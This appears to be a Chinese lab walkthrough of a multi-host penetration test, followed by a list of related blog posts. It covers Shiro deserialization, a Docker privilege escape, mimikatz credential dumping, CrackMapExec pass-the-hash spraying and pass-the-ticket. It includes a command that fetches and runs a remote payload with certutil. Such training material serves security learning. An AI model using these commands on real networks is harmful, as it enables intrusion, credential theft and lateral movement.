VPC4-通达oa-docker逃逸-shiro反序列化-hash传递-CrackMapExec喷射-历史ptt攻击-进程注入

由于本人是菜鸡,不会免杀,所有免杀的部分就直接跳过了

(hhh)

靶场地址:

链接: https://pan.baidu.com/s/1Fh1Zg79n1yjCPe6rrQ2apA 提取码: qiag

第一台ubuntu(docker逃逸,shiro反序列化)

fscan扫到一台机器

发现remember me,怀疑存在shiro反序列化漏洞

反弹到kali上

ls -al发现根目录有docker文件,说明我们可能在docker中

cat /proc/self/status | grep CapEff(发现存在特权逃逸)

查看目录:fdisk -l

mkdir /test && mount /dev/sda1 /test

(把原始机里面的机器移动到 /test里面)

发现了真机的目录的东西

进入里面

更改里面的密钥为自己kali主机的密钥对文件

将这个值复制到

直接ssh连接

上线msf

生成后门后,启动服务

第二种信息收集方式,frp

然后连接fscan开始扫描

第二台(通达oa)

上线msf

第一台主机建立路由

run post/multi/manage/autoroute

第三台 第四台密码喷射

hashdump导出所有的hash

或者用mimikatz导出、

两个口令

第一种:mimikatz.exe " privilege::debug" "log" sekurlsa::logonpasswords"

第二种:

mimikatz # privilege::debug

mimikatz # token::elevate

mimikatz # lsadump::sam

CrackMapExec-密码喷射

proxychains crackmapexec smb 192.168.3.1-150 -u Administrator -H 518b98ad4178a53695dc997aa02d455c --local-auth

发现有两个成功的(出现这(Pwn3d!)就表示成功的)

监听

proxychains crackmapexec smb 192.168.3.1-150 -u Administrator -H 518b98ad4178a53695dc997aa02d455c --local-auth -x "cmd.exe /c certutil -urlcache -split -f http://192.168.3.11/1979.exe 1979.exe & 1979.exe"

成功上线

第五台(历史ptt攻击)

未导出票据之前

导出票据:

mimikatz sekurlsa::tickets /export

查看票据:shell klist

利用票据连接:shell dir \owa2010cn-god\c$

因为可能是system或者administrator权限,所有可能连接不上,就尝试进程注入到域用户上

ps查看进程

migrate

相关推荐
云宏信息24 分钟前
赛迪顾问《2025中国虚拟化市场研究报告》解读丨虚拟化市场迈向“多元算力架构”,国产化与AI驱动成关键变量
网络·人工智能·ai·容器·性能优化·架构·云计算
纷飞的花火丶32 分钟前
Oracle数据库注入基础入门
网络安全·oracle·sql注入
挨踢攻城38 分钟前
Linux 安全 | 使用 iptables 测量流量
linux·服务器·安全·iptables·linux安全·厦门微思网络·测量流量
沧澜sincerely1 小时前
Redis 键空间 & 五大类型
java·redis·docker
通信瓦工1 小时前
IEC 60598-1-2020灯具通用安全要求标准介绍
安全·灯具·标准下载
浅拾光º1 小时前
mysql字符串截取,如何在MySQL备份文件中安全截取敏感字符串?
数据库·mysql·安全
踏过山河,踏过海1 小时前
在SSL证书是有效的前提下,依旧显示“资源不安全
网络协议·安全·ssl
阿方索1 小时前
DHCP 服务器
linux·运维
小心草里有鬼2 小时前
Linux 数据库 Mysql8 主从复制
linux·运维·数据库·sql·mysql
黄昏恋慕黎明2 小时前
javaEE初阶 网络编程(socket初识)
运维·服务器·网络